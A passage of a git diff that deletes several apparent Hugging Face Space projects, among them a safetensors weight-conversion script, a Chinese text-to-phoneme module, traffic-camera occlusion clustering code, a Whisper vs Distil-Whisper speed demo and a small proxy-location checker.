global_approx_scores.pop(); - } -} - -torch::Tensor filter_pids(const torch::Tensor pids, 
- const torch::Tensor centroid_scores, - const torch::Tensor codes, - const torch::Tensor doclens, - const torch::Tensor offsets, const torch::Tensor idx, - int nfiltered_docs) { - auto ncentroids = centroid_scores.size(0); - auto nquery_vectors = centroid_scores.size(1); - auto npids = pids.size(0); - - auto pids_a = pids.data_ptr(); - auto centroid_scores_a = centroid_scores.data_ptr(); - auto codes_a = codes.data_ptr(); - auto doclens_a = doclens.data_ptr(); - auto offsets_a = offsets.data_ptr(); - auto idx_a = idx.data_ptr(); - - int filtered_pids[nfiltered_docs]; - filter_pids_helper(ncentroids, nquery_vectors, npids, pids_a, - centroid_scores_a, codes_a, doclens_a, offsets_a, idx_a, - nfiltered_docs, filtered_pids); - - int nfinal_filtered_docs = (int)(nfiltered_docs / 4); - int final_filtered_pids[nfinal_filtered_docs]; - bool ones[ncentroids]; - for (int i = 0; i < ncentroids; i++) { - ones[i] = true; - } - filter_pids_helper(ncentroids, nquery_vectors, nfiltered_docs, - filtered_pids, centroid_scores_a, codes_a, doclens_a, - offsets_a, ones, nfinal_filtered_docs, - final_filtered_pids); - - auto options = - torch::TensorOptions().dtype(torch::kInt32).requires_grad(false); - return torch::from_blob(final_filtered_pids, {nfinal_filtered_docs}, - options) - .clone(); -} - -PYBIND11_MODULE(TORCH_EXTENSION_NAME, m) { - m.def("filter_pids_cpp", &filter_pids, "Filter pids"); -} - diff --git a/spaces/diffusers/convert/convert.py b/spaces/diffusers/convert/convert.py deleted file mode 100644 index 7244f58035dedff15c8246c83968d2c57897c676..0000000000000000000000000000000000000000 --- a/spaces/diffusers/convert/convert.py +++ /dev/null @@ -1,231 +0,0 @@ -import argparse -import json -import os -import shutil -from collections import defaultdict -from inspect import signature -from tempfile import TemporaryDirectory -from typing import Dict, List, Optional, Set - -import torch - -from huggingface_hub import CommitInfo, CommitOperationAdd, Discussion, HfApi, hf_hub_download -from huggingface_hub.file_download import repo_folder_name -from safetensors.torch import load_file, save_file -from transformers import AutoConfig -from transformers.pipelines.base import infer_framework_load_model - - -class AlreadyExists(Exception): - pass - - -def shared_pointers(tensors): - ptrs = defaultdict(list) - for k, v in tensors.items(): - ptrs[v.data_ptr()].append(k) - failing = [] - for ptr, names in ptrs.items(): - if len(names) > 1: - failing.append(names) - return failing - - -def check_file_size(sf_filename: str, pt_filename: str): - sf_size = os.stat(sf_filename).st_size - pt_size = os.stat(pt_filename).st_size - - if (sf_size - pt_size) / pt_size > 0.01: - raise RuntimeError( - f"""The file size different is more than 1%: - - {sf_filename}: {sf_size} - - {pt_filename}: {pt_size} - """ - ) - - -def rename(pt_filename: str) -> str: - filename, ext = os.path.splitext(pt_filename) - local = f"{filename}.safetensors" - local = local.replace("pytorch_model", "model") - return local - - -def convert_multi(model_id: str, folder: str) -> List["CommitOperationAdd"]: - filename = hf_hub_download(repo_id=model_id, filename="pytorch_model.bin.index.json") - with open(filename, "r") as f: - data = json.load(f) - - filenames = set(data["weight_map"].values()) - local_filenames = [] - for filename in filenames: - pt_filename = hf_hub_download(repo_id=model_id, filename=filename) - - sf_filename = rename(pt_filename) - sf_filename = os.path.join(folder, sf_filename) - convert_file(pt_filename, sf_filename) - 
local_filenames.append(sf_filename) - - index = os.path.join(folder, "model.safetensors.index.json") - with open(index, "w") as f: - newdata = {k: v for k, v in data.items()} - newmap = {k: rename(v) for k, v in data["weight_map"].items()} - newdata["weight_map"] = newmap - json.dump(newdata, f, indent=4) - local_filenames.append(index) - - operations = [ - CommitOperationAdd(path_in_repo=local.split("/")[-1], path_or_fileobj=local) for local in local_filenames - ] - - return operations - - -def convert_single(model_id: str, folder: str) -> List["CommitOperationAdd"]: - pt_filename = hf_hub_download(repo_id=model_id, filename="pytorch_model.bin") - - sf_name = "model.safetensors" - sf_filename = os.path.join(folder, sf_name) - convert_file(pt_filename, sf_filename) - operations = [CommitOperationAdd(path_in_repo=sf_name, path_or_fileobj=sf_filename)] - return operations - - -def convert_file( - pt_filename: str, - sf_filename: str, -): - loaded = torch.load(pt_filename, map_location="cpu") - if "state_dict" in loaded: - loaded = loaded["state_dict"] - shared = shared_pointers(loaded) - for shared_weights in shared: - for name in shared_weights[1:]: - loaded.pop(name) - - # For tensors to be contiguous - loaded = {k: v.contiguous() for k, v in loaded.items()} - - dirname = os.path.dirname(sf_filename) - os.makedirs(dirname, exist_ok=True) - save_file(loaded, sf_filename, metadata={"format": "pt"}) - check_file_size(sf_filename, pt_filename) - reloaded = load_file(sf_filename) - for k in loaded: - pt_tensor = loaded[k] - sf_tensor = reloaded[k] - if not torch.equal(pt_tensor, sf_tensor): - raise RuntimeError(f"The output tensors do not match for key {k}") - - -def create_diff(pt_infos: Dict[str, List[str]], sf_infos: Dict[str, List[str]]) -> str: - errors = [] - for key in ["missing_keys", "mismatched_keys", "unexpected_keys"]: - pt_set = set(pt_infos[key]) - sf_set = set(sf_infos[key]) - - pt_only = pt_set - sf_set - sf_only = sf_set - pt_set - - if pt_only: - errors.append(f"{key} : PT warnings contain {pt_only} which are not present in SF warnings") - if sf_only: - errors.append(f"{key} : SF warnings contain {sf_only} which are not present in PT warnings") - return "\n".join(errors) - -def previous_pr(api: "HfApi", model_id: str, pr_title: str) -> Optional["Discussion"]: - try: - discussions = api.get_repo_discussions(repo_id=model_id) - except Exception: - return None - for discussion in discussions: - if discussion.status == "open" and discussion.is_pull_request and discussion.title == pr_title: - return discussion - - -def convert_generic(model_id: str, folder: str, filenames: Set[str]) -> List["CommitOperationAdd"]: - operations = [] - - extensions = set([".bin", ".ckpt"]) - for filename in filenames: - prefix, ext = os.path.splitext(filename) - if ext in extensions: - pt_filename = hf_hub_download(model_id, filename=filename) - dirname, raw_filename = os.path.split(filename) - if raw_filename == "pytorch_model.bin": - # XXX: This is a special case to handle `transformers` and the - # `transformers` part of the model which is actually loaded by `transformers`. 
- sf_in_repo = os.path.join(dirname, "model.safetensors") - else: - sf_in_repo = f"{prefix}.safetensors" - sf_filename = os.path.join(folder, sf_in_repo) - convert_file(pt_filename, sf_filename) - operations.append(CommitOperationAdd(path_in_repo=sf_in_repo, path_or_fileobj=sf_filename)) - return operations - - -def convert(api: "HfApi", model_id: str, force: bool = False) -> Optional["CommitInfo"]: - pr_title = "Adding `safetensors` variant of this model" - info = api.model_info(model_id) - - def is_valid_filename(filename): - return len(filename.split("/")) > 1 or filename in ["pytorch_model.bin", "diffusion_pytorch_model.bin"] - filenames = set(s.rfilename for s in info.siblings if is_valid_filename(s.rfilename)) - - print(filenames) - with TemporaryDirectory() as d: - folder = os.path.join(d, repo_folder_name(repo_id=model_id, repo_type="models")) - os.makedirs(folder) - new_pr = None - try: - operations = None - pr = previous_pr(api, model_id, pr_title) - - library_name = getattr(info, "library_name", None) - if any(filename.endswith(".safetensors") for filename in filenames) and not force: - raise AlreadyExists(f"Model {model_id} is already converted, skipping..") - elif pr is not None and not force: - url = f"https://huggingface.co/{model_id}/discussions/{pr.num}" - new_pr = pr - raise AlreadyExists(f"Model {model_id} already has an open PR check out {url}") - else: - print("Convert generic") - operations = convert_generic(model_id, folder, filenames) - - if operations: - new_pr = api.create_commit( - repo_id=model_id, - operations=operations, - commit_message=pr_title, - create_pr=True, - ) - print(f"Pr created at {new_pr.pr_url}") - else: - print("No files to convert") - finally: - shutil.rmtree(folder) - return new_pr - - -if __name__ == "__main__": - DESCRIPTION = """ - Simple utility tool to convert automatically some weights on the hub to `safetensors` format. - It is PyTorch exclusive for now. - It works by downloading the weights (PT), converting them locally, and uploading them back - as a PR on the hub. - """ - parser = argparse.ArgumentParser(description=DESCRIPTION) - parser.add_argument( - "model_id", - type=str, - help="The name of the model on the hub to convert. E.g. `gpt2` or `facebook/wav2vec2-base-960h`", - ) - parser.add_argument( - "--force", - action="store_true", - help="Create the PR even if it already exists of if the model was already converted.", - ) - args = parser.parse_args() - model_id = args.model_id - api = HfApi() - convert(api, model_id, force=args.force) diff --git a/spaces/digitalOSHO/webui/oh-no.py b/spaces/digitalOSHO/webui/oh-no.py deleted file mode 100644 index e8c0f3bd8d72805b4ee69d4d0fd9133347d00f92..0000000000000000000000000000000000000000 --- a/spaces/digitalOSHO/webui/oh-no.py +++ /dev/null @@ -1,14 +0,0 @@ -import gradio as gr - -block = gr.Blocks() - -def run(): - with block: - gr.Markdown( - """ -

      oh no 😐 something wrong with the 🤗 hugging face servers 😐 hopefully, it will be fixed soon

      - """) - block.launch(server_name="0.0.0.0", server_port=7860) - -if __name__ == "__main__": - run() \ No newline at end of file diff --git a/spaces/digitalxingtong/Kino-Bert-VITS2/text/chinese.py b/spaces/digitalxingtong/Kino-Bert-VITS2/text/chinese.py deleted file mode 100644 index 276753880b73de2e8889dcb2101cd98c09e0710b..0000000000000000000000000000000000000000 --- a/spaces/digitalxingtong/Kino-Bert-VITS2/text/chinese.py +++ /dev/null @@ -1,193 +0,0 @@ -import os -import re - -import cn2an -from pypinyin import lazy_pinyin, Style - -from text import symbols -from text.symbols import punctuation -from text.tone_sandhi import ToneSandhi - -current_file_path = os.path.dirname(__file__) -pinyin_to_symbol_map = {line.split("\t")[0]: line.strip().split("\t")[1] for line in - open(os.path.join(current_file_path, 'opencpop-strict.txt')).readlines()} - -import jieba.posseg as psg - - -rep_map = { - ':': ',', - ';': ',', - ',': ',', - '。': '.', - '!': '!', - '?': '?', - '\n': '.', - "·": ",", - '、': ",", - '...': '…', - '$': '.', - '“': "'", - '”': "'", - '‘': "'", - '’': "'", - '(': "'", - ')': "'", - '(': "'", - ')': "'", - '《': "'", - '》': "'", - '【': "'", - '】': "'", - '[': "'", - ']': "'", - '—': "-", - '~': "-", - '~': "-", - '「': "'", - '」': "'", - -} - -tone_modifier = ToneSandhi() - -def replace_punctuation(text): - text = text.replace("嗯", "恩").replace("呣","母") - pattern = re.compile('|'.join(re.escape(p) for p in rep_map.keys())) - - replaced_text = pattern.sub(lambda x: rep_map[x.group()], text) - - replaced_text = re.sub(r'[^\u4e00-\u9fa5'+"".join(punctuation)+r']+', '', replaced_text) - - return replaced_text - -def g2p(text): - pattern = r'(?<=[{0}])\s*'.format(''.join(punctuation)) - sentences = [i for i in re.split(pattern, text) if i.strip()!=''] - phones, tones, word2ph = _g2p(sentences) - assert sum(word2ph) == len(phones) - assert len(word2ph) == len(text) #Sometimes it will crash,you can add a try-catch. 
- phones = ['_'] + phones + ["_"] - tones = [0] + tones + [0] - word2ph = [1] + word2ph + [1] - return phones, tones, word2ph - - -def _get_initials_finals(word): - initials = [] - finals = [] - orig_initials = lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.INITIALS) - orig_finals = lazy_pinyin( - word, neutral_tone_with_five=True, style=Style.FINALS_TONE3) - for c, v in zip(orig_initials, orig_finals): - initials.append(c) - finals.append(v) - return initials, finals - - -def _g2p(segments): - phones_list = [] - tones_list = [] - word2ph = [] - for seg in segments: - pinyins = [] - # Replace all English words in the sentence - seg = re.sub('[a-zA-Z]+', '', seg) - seg_cut = psg.lcut(seg) - initials = [] - finals = [] - seg_cut = tone_modifier.pre_merge_for_modify(seg_cut) - for word, pos in seg_cut: - if pos == 'eng': - continue - sub_initials, sub_finals = _get_initials_finals(word) - sub_finals = tone_modifier.modified_tone(word, pos, - sub_finals) - initials.append(sub_initials) - finals.append(sub_finals) - - # assert len(sub_initials) == len(sub_finals) == len(word) - initials = sum(initials, []) - finals = sum(finals, []) - # - for c, v in zip(initials, finals): - raw_pinyin = c+v - # NOTE: post process for pypinyin outputs - # we discriminate i, ii and iii - if c == v: - assert c in punctuation - phone = [c] - tone = '0' - word2ph.append(1) - else: - v_without_tone = v[:-1] - tone = v[-1] - - pinyin = c+v_without_tone - assert tone in '12345' - - if c: - # 多音节 - v_rep_map = { - "uei": 'ui', - 'iou': 'iu', - 'uen': 'un', - } - if v_without_tone in v_rep_map.keys(): - pinyin = c+v_rep_map[v_without_tone] - else: - # 单音节 - pinyin_rep_map = { - 'ing': 'ying', - 'i': 'yi', - 'in': 'yin', - 'u': 'wu', - } - if pinyin in pinyin_rep_map.keys(): - pinyin = pinyin_rep_map[pinyin] - else: - single_rep_map = { - 'v': 'yu', - 'e': 'e', - 'i': 'y', - 'u': 'w', - } - if pinyin[0] in single_rep_map.keys(): - pinyin = single_rep_map[pinyin[0]]+pinyin[1:] - - assert pinyin in pinyin_to_symbol_map.keys(), (pinyin, seg, raw_pinyin) - phone = pinyin_to_symbol_map[pinyin].split(' ') - word2ph.append(len(phone)) - - phones_list += phone - tones_list += [int(tone)] * len(phone) - return phones_list, tones_list, word2ph - - - -def text_normalize(text): - numbers = re.findall(r'\d+(?:\.?\d+)?', text) - for number in numbers: - text = text.replace(number, cn2an.an2cn(number), 1) - text = replace_punctuation(text) - return text - -def get_bert_feature(text, word2ph): - from text import chinese_bert - return chinese_bert.get_bert_feature(text, word2ph) - -if __name__ == '__main__': - from text.chinese_bert import get_bert_feature - text = "啊!但是《原神》是由,米哈\游自主, [研发]的一款全.新开放世界.冒险游戏" - text = text_normalize(text) - print(text) - phones, tones, word2ph = g2p(text) - bert = get_bert_feature(text, word2ph) - - print(phones, tones, word2ph, bert.shape) - - -# # 示例用法 -# text = "这是一个示例文本:,你好!这是一个测试...." 
-# print(g2p_paddle(text)) # 输出: 这是一个示例文本你好这是一个测试 diff --git a/spaces/dineshreddy/WALT/cwalt/Clip_WALT_Generate.py b/spaces/dineshreddy/WALT/cwalt/Clip_WALT_Generate.py deleted file mode 100644 index 09540a37a3a94600ac01a585f58b09270d070da7..0000000000000000000000000000000000000000 --- a/spaces/dineshreddy/WALT/cwalt/Clip_WALT_Generate.py +++ /dev/null @@ -1,284 +0,0 @@ -#!/usr/bin/env python3 -# -*- coding: utf-8 -*- -""" -Created on Fri May 20 15:15:11 2022 - -@author: dinesh -""" - -from collections import OrderedDict -from matplotlib import pyplot as plt -from .utils import * -import scipy.interpolate - -from scipy import interpolate -from .clustering_utils import * -import glob -import cv2 -from PIL import Image - - -import json -import cv2 - -import numpy as np -from tqdm import tqdm - - -def ignore_indexes(tracks_all, labels_all): - # get repeating bounding boxes - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x == y] - ignore_ind = [] - for index, track in enumerate(tracks_all): - print('in ignore', index, len(tracks_all)) - if index in ignore_ind: - continue - - if labels_all[index] < 1 or labels_all[index] > 3: - ignore_ind.extend([index]) - - ind = get_indexes(track, tracks_all) - if len(ind) > 30: - ignore_ind.extend(ind) - - return ignore_ind - -def repeated_indexes_old(tracks_all,ignore_ind, unoccluded_indexes=None): - # get repeating bounding boxes - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if bb_intersection_over_union(x, y) > 0.8 and i not in ignore_ind] - repeat_ind = [] - repeat_inds =[] - if unoccluded_indexes == None: - for index, track in enumerate(tracks_all): - if index in repeat_ind or index in ignore_ind: - continue - ind = get_indexes(track, tracks_all) - if len(ind) > 20: - repeat_ind.extend(ind) - repeat_inds.append([ind,track]) - else: - for index in unoccluded_indexes: - if index in repeat_ind or index in ignore_ind: - continue - ind = get_indexes(tracks_all[index], tracks_all) - if len(ind) > 3: - repeat_ind.extend(ind) - repeat_inds.append([ind,tracks_all[index]]) - return repeat_inds - -def get_unoccluded_instances(timestamps_final, tracks_all, ignore_ind=[], threshold = 0.01): - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x==y] - unoccluded_indexes = [] - time_checked = [] - stationary_obj = [] - count =0 - - for time in tqdm(np.unique(timestamps_final), desc="Detecting Unocclued objects in Image "): - count += 1 - if [time.year,time.month, time.day, time.hour, time.minute, time.second, time.microsecond] in time_checked: - analyze_bb = [] - for ind in unoccluded_indexes_time: - for ind_compare in same_time_instances: - iou = bb_intersection_over_union(tracks_all[ind], tracks_all[ind_compare]) - if iou < 0.5 and iou > 0: - analyze_bb.extend([ind_compare]) - if iou > 0.99: - stationary_obj.extend([str(ind_compare)+'+'+str(ind)]) - - for ind in analyze_bb: - occ = False - for ind_compare in same_time_instances: - if bb_intersection_over_union_unoccluded(tracks_all[ind], tracks_all[ind_compare], threshold=threshold) > threshold and ind_compare != ind: - occ = True - break - if occ == False: - unoccluded_indexes.extend([ind]) - continue - - same_time_instances = get_indexes(time,timestamps_final) - unoccluded_indexes_time = [] - - for ind in same_time_instances: - if tracks_all[ind][4] < 0.9 or ind in ignore_ind:# or ind != 1859: - continue - occ = False - for ind_compare in same_time_instances: - if bb_intersection_over_union_unoccluded(tracks_all[ind], tracks_all[ind_compare], 
threshold=threshold) > threshold and ind_compare != ind and tracks_all[ind_compare][4] < 0.5: - occ = True - break - if occ==False: - unoccluded_indexes.extend([ind]) - unoccluded_indexes_time.extend([ind]) - time_checked.append([time.year,time.month, time.day, time.hour, time.minute, time.second, time.microsecond]) - return unoccluded_indexes,stationary_obj - -def visualize_unoccluded_detection(timestamps_final,tracks_all,segmentation_all, unoccluded_indexes, cwalt_data_path, camera_name, ignore_ind=[]): - tracks_final = [] - tracks_final.append([]) - try: - os.mkdir(cwalt_data_path + '/' + camera_name+'_unoccluded_car_detection/') - except: - print('Unoccluded debugging exists') - - for time in tqdm(np.unique(timestamps_final), desc="Visualizing Unocclued objects in Image "): - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if x==y] - ind = get_indexes(time, timestamps_final) - image_unocc = False - for index in ind: - if index not in unoccluded_indexes: - continue - else: - image_unocc = True - break - if image_unocc == False: - continue - - for week_loop in range(5): - try: - image = np.array(Image.open(cwalt_data_path+'/week' +str(week_loop)+'/'+ str(time).replace(' ','T').replace(':','-').split('+')[0] + '.jpg')) - break - except: - continue - - try: - mask = image*0 - except: - print('image not found for ' + str(time).replace(' ','T').replace(':','-').split('+')[0] + '.jpg' ) - continue - image_original = image.copy() - - for index in ind: - track = tracks_all[index] - - if index in ignore_ind: - continue - if index not in unoccluded_indexes: - continue - try: - bb_left, bb_top, bb_width, bb_height, confidence, id = track - except: - bb_left, bb_top, bb_width, bb_height, confidence = track - - if confidence > 0.6: - mask = poly_seg(image, segmentation_all[index]) - cv2.imwrite(cwalt_data_path + '/' + camera_name+'_unoccluded_car_detection/' + str(index)+'.png', mask[:, :, ::-1]) - -def repeated_indexes(tracks_all,ignore_ind, repeat_count = 10, unoccluded_indexes=None): - get_indexes = lambda x, xs: [i for (y, i) in zip(xs, range(len(xs))) if bb_intersection_over_union(x, y) > 0.8 and i not in ignore_ind] - repeat_ind = [] - repeat_inds =[] - if unoccluded_indexes == None: - for index, track in enumerate(tracks_all): - if index in repeat_ind or index in ignore_ind: - continue - - ind = get_indexes(track, tracks_all) - if len(ind) > repeat_count: - repeat_ind.extend(ind) - repeat_inds.append([ind,track]) - else: - for index in unoccluded_indexes: - if index in repeat_ind or index in ignore_ind: - continue - ind = get_indexes(tracks_all[index], tracks_all) - if len(ind) > repeat_count: - repeat_ind.extend(ind) - repeat_inds.append([ind,tracks_all[index]]) - - - return repeat_inds - -def poly_seg(image, segm): - poly = np.array(segm).reshape((int(len(segm)/2), 2)) - overlay = image.copy() - alpha = 0.5 - cv2.fillPoly(overlay, [poly], color=(255, 255, 0)) - cv2.addWeighted(overlay, alpha, image, 1 - alpha, 0, image) - return image - -def visualize_unoccuded_clusters(repeat_inds, tracks, segmentation_all, timestamps_final, cwalt_data_path): - for index_, repeat_ind in enumerate(repeat_inds): - image = np.array(Image.open(cwalt_data_path+'/'+'T18-median_image.jpg')) - try: - os.mkdir(cwalt_data_path+ '/Cwalt_database/') - except: - print('folder exists') - try: - os.mkdir(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/') - except: - print(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/') - - for i in repeat_ind[0]: - try: - bb_left, bb_top, bb_width, 
bb_height, confidence = tracks[i]#bbox - except: - bb_left, bb_top, bb_width, bb_height, confidence, track_id = tracks[i]#bbox - - cv2.rectangle(image,(int(bb_left), int(bb_top)),(int(bb_left+bb_width), int(bb_top+bb_height)),(0, 0, 255), 2) - time = timestamps_final[i] - for week_loop in range(5): - try: - image1 = np.array(Image.open(cwalt_data_path+'/week' +str(week_loop)+'/'+ str(time).replace(' ','T').replace(':','-').split('+')[0] + '.jpg')) - break - except: - continue - - crop = image1[int(bb_top): int(bb_top + bb_height), int(bb_left):int(bb_left + bb_width)] - cv2.imwrite(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/o_' + str(i) +'.jpg', crop[:, :, ::-1]) - image1 = poly_seg(image1,segmentation_all[i]) - crop = image1[int(bb_top): int(bb_top + bb_height), int(bb_left):int(bb_left + bb_width)] - cv2.imwrite(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'/' + str(i)+'.jpg', crop[:, :, ::-1]) - if index_ > 100: - break - - cv2.imwrite(cwalt_data_path+ '/Cwalt_database/' + str(index_) +'.jpg', image[:, :, ::-1]) - -def Get_unoccluded_objects(camera_name, debug = False, scale=True): - cwalt_data_path = 'data/' + camera_name - data_folder = cwalt_data_path - json_file_path = cwalt_data_path + '/' + camera_name + '.json' - - with open(json_file_path, 'r') as j: - annotations = json.loads(j.read()) - - tracks_all = [parse_bbox(anno['bbox']) for anno in annotations] - segmentation_all = [parse_bbox(anno['segmentation']) for anno in annotations] - labels_all = [anno['label_id'] for anno in annotations] - timestamps_final = [parse(anno['time']) for anno in annotations] - - if scale ==True: - scale_factor = 2 - tracks_all_numpy = np.array(tracks_all) - tracks_all_numpy[:,:4] = np.array(tracks_all)[:,:4]/scale_factor - tracks_all = tracks_all_numpy.tolist() - - segmentation_all_scaled = [] - for list_loop in segmentation_all: - segmentation_all_scaled.append((np.floor_divide(np.array(list_loop),scale_factor)).tolist()) - segmentation_all = segmentation_all_scaled - - if debug == True: - timestamps_final = timestamps_final[:1000] - labels_all = labels_all[:1000] - segmentation_all = segmentation_all[:1000] - tracks_all = tracks_all[:1000] - - unoccluded_indexes, stationary = get_unoccluded_instances(timestamps_final, tracks_all, threshold = 0.05) - if debug == True: - visualize_unoccluded_detection(timestamps_final, tracks_all, segmentation_all, unoccluded_indexes, cwalt_data_path, camera_name) - - tracks_all_unoccluded = [tracks_all[i] for i in unoccluded_indexes] - segmentation_all_unoccluded = [segmentation_all[i] for i in unoccluded_indexes] - labels_all_unoccluded = [labels_all[i] for i in unoccluded_indexes] - timestamps_final_unoccluded = [timestamps_final[i] for i in unoccluded_indexes] - np.savez(json_file_path,tracks_all_unoccluded=tracks_all_unoccluded, segmentation_all_unoccluded=segmentation_all_unoccluded, labels_all_unoccluded=labels_all_unoccluded, timestamps_final_unoccluded=timestamps_final_unoccluded ) - - if debug == True: - repeat_inds_clusters = repeated_indexes(tracks_all_unoccluded,[], repeat_count=1) - visualize_unoccuded_clusters(repeat_inds_clusters, tracks_all_unoccluded, segmentation_all_unoccluded, timestamps_final_unoccluded, cwalt_data_path) - else: - repeat_inds_clusters = repeated_indexes(tracks_all_unoccluded,[], repeat_count=10) - - np.savez(json_file_path + '_clubbed', repeat_inds=repeat_inds_clusters) - np.savez(json_file_path + '_stationary', stationary=stationary) - diff --git a/spaces/distil-whisper/whisper-vs-distil-whisper/app.py 
b/spaces/distil-whisper/whisper-vs-distil-whisper/app.py deleted file mode 100644 index 64b35c7ed88d9b339139dcb44af4d54bd37d6f6d..0000000000000000000000000000000000000000 --- a/spaces/distil-whisper/whisper-vs-distil-whisper/app.py +++ /dev/null @@ -1,154 +0,0 @@ -from transformers import AutoModelForSpeechSeq2Seq, AutoProcessor, pipeline -from transformers.utils import is_flash_attn_2_available -from transformers.pipelines.audio_utils import ffmpeg_read -import torch -import gradio as gr -import time - -BATCH_SIZE = 16 -MAX_AUDIO_MINS = 30 # maximum audio input in minutes - -device = "cuda:0" if torch.cuda.is_available() else "cpu" -torch_dtype = torch.float16 if torch.cuda.is_available() else torch.float32 -use_flash_attention_2 = is_flash_attn_2_available() - -model = AutoModelForSpeechSeq2Seq.from_pretrained( - "openai/whisper-large-v2", torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True, use_flash_attention_2=use_flash_attention_2 -) -distilled_model = AutoModelForSpeechSeq2Seq.from_pretrained( - "distil-whisper/distil-large-v2", torch_dtype=torch_dtype, low_cpu_mem_usage=True, use_safetensors=True, use_flash_attention_2=use_flash_attention_2 -) - -if not use_flash_attention_2: - # use flash attention from pytorch sdpa - model = model.to_bettertransformer() - distilled_model = distilled_model.to_bettertransformer() - -processor = AutoProcessor.from_pretrained("openai/whisper-large-v2") - -model.to(device) -distilled_model.to(device) - -pipe = pipeline( - "automatic-speech-recognition", - model=model, - tokenizer=processor.tokenizer, - feature_extractor=processor.feature_extractor, - max_new_tokens=128, - chunk_length_s=30, - torch_dtype=torch_dtype, - device=device, - generate_kwargs={"language": "en", "task": "transcribe"}, - return_timestamps=True -) -pipe_forward = pipe._forward - -distil_pipe = pipeline( - "automatic-speech-recognition", - model=distilled_model, - tokenizer=processor.tokenizer, - feature_extractor=processor.feature_extractor, - max_new_tokens=128, - chunk_length_s=15, - torch_dtype=torch_dtype, - device=device, - generate_kwargs={"language": "en", "task": "transcribe"}, -) -distil_pipe_forward = distil_pipe._forward - -def transcribe(inputs): - if inputs is None: - raise gr.Error("No audio file submitted! Please record or upload an audio file before submitting your request.") - - with open(inputs, "rb") as f: - inputs = f.read() - - inputs = ffmpeg_read(inputs, pipe.feature_extractor.sampling_rate) - audio_length_mins = len(inputs) / pipe.feature_extractor.sampling_rate / 60 - - if audio_length_mins > MAX_AUDIO_MINS: - raise gr.Error( - f"To ensure fair usage of the Space, the maximum audio length permitted is {MAX_AUDIO_MINS} minutes." - f"Got an audio of length {round(audio_length_mins, 3)} minutes." 
- ) - - inputs = {"array": inputs, "sampling_rate": pipe.feature_extractor.sampling_rate} - - def _forward_distil_time(*args, **kwargs): - global distil_runtime - start_time = time.time() - result = distil_pipe_forward(*args, **kwargs) - distil_runtime = time.time() - start_time - distil_runtime = round(distil_runtime, 2) - return result - - distil_pipe._forward = _forward_distil_time - distil_text = distil_pipe(inputs.copy(), batch_size=BATCH_SIZE)["text"] - yield distil_text, distil_runtime, None, None, None - - def _forward_time(*args, **kwargs): - global runtime - start_time = time.time() - result = pipe_forward(*args, **kwargs) - runtime = time.time() - start_time - runtime = round(runtime, 2) - return result - - pipe._forward = _forward_time - text = pipe(inputs, batch_size=BATCH_SIZE)["text"] - - yield distil_text, distil_runtime, text, runtime - -if __name__ == "__main__": - with gr.Blocks() as demo: - gr.HTML( - """ -
      -
      -

      - Whisper vs Distil-Whisper: Speed Comparison -

      -
      -
      - """ - ) - gr.HTML( - f""" -

      Distil-Whisper is a distilled variant - of the Whisper model by OpenAI. Compared to Whisper, - Distil-Whisper runs 6x faster with 50% fewer parameters, while performing to within 1% word error rate (WER) on - out-of-distribution evaluation data.

      - -

      In this demo, we perform a speed comparison between Whisper and Distil-Whisper in order to test this claim. - Both models use the chunked long-form transcription algorithm - in 🤗 Transformers, as well as Flash Attention. To use Distil-Whisper yourself, check the code examples on the - Distil-Whisper repository. To ensure fair - usage of the Space, we ask that audio file inputs are kept to < 30 mins.

      - """ - ) - audio = gr.components.Audio(type="filepath", label="Audio input") - button = gr.Button("Transcribe") - with gr.Row(): - distil_runtime = gr.components.Textbox(label="Distil-Whisper Transcription Time (s)") - runtime = gr.components.Textbox(label="Whisper Transcription Time (s)") - with gr.Row(): - distil_transcription = gr.components.Textbox(label="Distil-Whisper Transcription", show_copy_button=True) - transcription = gr.components.Textbox(label="Whisper Transcription", show_copy_button=True) - button.click( - fn=transcribe, - inputs=audio, - outputs=[distil_transcription, distil_runtime, transcription, runtime], - ) - gr.Markdown("## Examples") - gr.Examples( - [["./assets/example_1.wav"], ["./assets/example_2.wav"]], - audio, - outputs=[distil_transcription, distil_runtime, transcription, runtime], - fn=transcribe, - cache_examples=False, - ) - demo.queue(max_size=10).launch() diff --git a/spaces/doctorsafe/mychat/check_proxy.py b/spaces/doctorsafe/mychat/check_proxy.py deleted file mode 100644 index d6263ad981272b0a798bf278a9e83b99e6928711..0000000000000000000000000000000000000000 --- a/spaces/doctorsafe/mychat/check_proxy.py +++ /dev/null @@ -1,22 +0,0 @@ - -def check_proxy(proxies): - import requests - proxies_https = proxies['https'] if proxies is not None else '无' - try: - response = requests.get("https://ipapi.co/json/", proxies=proxies, timeout=4) - data = response.json() - print(f'查询代理的地理位置,返回的结果是{data}') - country = data['country_name'] - result = f"代理配置 {proxies_https}, 代理所在地:{country}" - print(result) - return result - except: - result = f"代理配置 {proxies_https}, 代理所在地查询超时,代理可能无效" - print(result) - return result - - -if __name__ == '__main__': - try: from config_private import proxies # 放自己的秘密如API和代理网址 os.path.exists('config_private.py') - except: from config import proxies - check_proxy(proxies) \ No newline at end of file diff --git a/spaces/dongyi/MMFS/models/__init__.py b/spaces/dongyi/MMFS/models/__init__.py deleted file mode 100644 index 1e3611e292cc0a2798d5ad2bd1a466356707a77a..0000000000000000000000000000000000000000 --- a/spaces/dongyi/MMFS/models/__init__.py +++ /dev/null @@ -1,68 +0,0 @@ -"""This package contains modules related to objective functions, optimizations, and network architectures. - -To add a custom model class called 'dummy', you need to add a file called 'dummy_model.py' and define a subclass DummyModel inherited from BaseModel. -You need to implement the following five functions: - -- <__init__>: initialize the class; first call BaseModel.__init__(self, opt). - -- : unpack data from dataset and apply preprocessing. - -- : produce intermediate results. - -- : calculate loss, gradients, and update network weights. - -- : (optionally) add model-specific options and set default options. - -In the function <__init__>, you need to define four lists: - -- self.loss_names (str list): specify the training losses that you want to plot and save. - -- self.model_names (str list): define networks used in our training. - -- self.visual_names (str list): specify the images that you want to display and save. - -- self.optimizers (optimizer list): define and initialize optimizers. You can define one optimizer for each network. If two networks are updated at the same time, you can use itertools.chain to group them. See 